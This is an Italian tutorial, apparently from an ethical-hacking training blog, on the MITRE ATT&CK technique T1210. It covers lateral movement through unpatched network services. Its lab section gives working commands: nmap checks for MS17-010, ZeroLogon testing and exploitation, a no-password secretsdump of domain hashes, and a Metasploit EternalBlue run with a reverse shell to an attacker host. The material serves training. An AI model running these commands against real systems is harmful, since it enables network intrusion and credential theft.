Sfruttamento di Servizi Remoti: Exploitation of Remote Services (T1210)

Quando un attaccante ha già un piede dentro la rete, il passo successivo è muoversi lateralmente verso sistemi di maggior valore. La tecnica T1210 descrive esattamente questo scenario: lo sfruttamento di vulnerabilità in servizi esposti sulla rete interna — SMB, RDP, database, web server, piattaforme di virtualizzazione — per ottenere l'esecuzione di codice su macchine remote senza bisogno di credenziali valide.

La tecnica si colloca nella tattica TA0008 – Lateral Movement, la fase della kill chain in cui l'avversario cerca di espandere il proprio controllo attraverso la rete compromessa, saltando da un host all'altro fino a raggiungere l'obiettivo finale. In molti casi lo sfruttamento di un servizio remoto garantisce anche un'escalation di privilegi implicita, poiché il codice viene eseguito nel contesto di sicurezza del servizio vulnerabile — spesso SYSTEM o root.

I numeri del framework confermano la centralità di questa tecnica nel panorama delle minacce: 11 gruppi APT, 13 famiglie software e 8 mitigazioni documentate. Le vulnerabilità ricorrenti sono un repertorio tristemente noto — EternalBlue (MS17-010), ZeroLogon (CVE-2020-1472), BlueKeep (CVE-2019-0708) — che continuano a comparire in campagne reali a distanza di anni dalla pubblicazione delle patch. Questo dato, da solo, racconta quanto il patching rimanga il tallone d'Achille di molte organizzazioni.


L'exploitation di servizi remoti in un engagement red team segue una sequenza ben definita: enumerazione dei servizi, identificazione della vulnerabilità, exploit, e conferma dell'accesso. Vediamo come replicarla con tool reali in un ambiente di laboratorio controllato.

La prima fase è la scoperta. Nmap (open source) è il punto di partenza naturale. Per identificare host con SMBv1 attivo e potenzialmente vulnerabili a EternalBlue, il comando più diretto è:

nmap -p 445 --script smb-vuln-ms17-010 -oA eternalblue_scan <target_range>

Questo script NSE verifica la presenza della vulnerabilità MS17-010 senza eseguire exploit attivo, producendo output classificato come "VULNERABLE" o "NOT VULNERABLE". Per una scansione più ampia che includa RDP e altri servizi tipicamente bersagliati:

nmap -sV -p 445,3389,5985,5986,1433,3306,5900,427 --open -oA lateral_services <target_range>

Per ZeroLogon (CVE-2020-1472), la verifica può essere effettuata con Impacket (open source), la suite Python di riferimento per i protocolli Windows. Lo script zerologon_tester.py, disponibile in diversi repository pubblici come proof-of-concept, verifica se un domain controller è vulnerabile senza alterarne lo stato:

python3 zerologon_tester.py <dc_netbios_name> <dc_ip>

In un esercizio autorizzato, l'exploit completo si esegue con zerologon_exploit.py dello stesso ecosistema, seguito dal dump degli hash con:

secretsdump.py -no-pass -just-dc /<dc_netbios_name>$@<dc_ip>

Per EternalBlue, Metasploit Framework (open source) offre il modulo più stabile e collaudato. La sequenza operativa nel contesto msfconsole è:

use exploit/windows/smb/ms17_010_eternalblue set RHOSTS set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST <attacker_ip> exploit

Se l'ambiente target include BlueKeep (CVE-2019-0708), Metasploit dispone del modulo exploit/windows/rdp/cve_2019_0708_bluekeep_rce, anche se la stabilità varia in base alla versione del target e al livello di patch parziale.

Per ambienti VMware vCenter, CrackMapExec (open source) consente di verificare rapidamente la raggiungibilità di servizi e testare credenziali recuperate da exploit precedenti:

crackmapexec smb <target_range> -u -p --shares

Un consiglio pratico: in laboratorio, costruite una piccola rete con macchine Windows 7 SP1 non patchate e un domain controller Windows Server 2016 pre-agosto 2020. Questo vi permette di esercitare sia l'EternalBlue chain che la ZeroLogon chain in un contesto realistico ma controllato, documentando ogni passaggio per il report.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo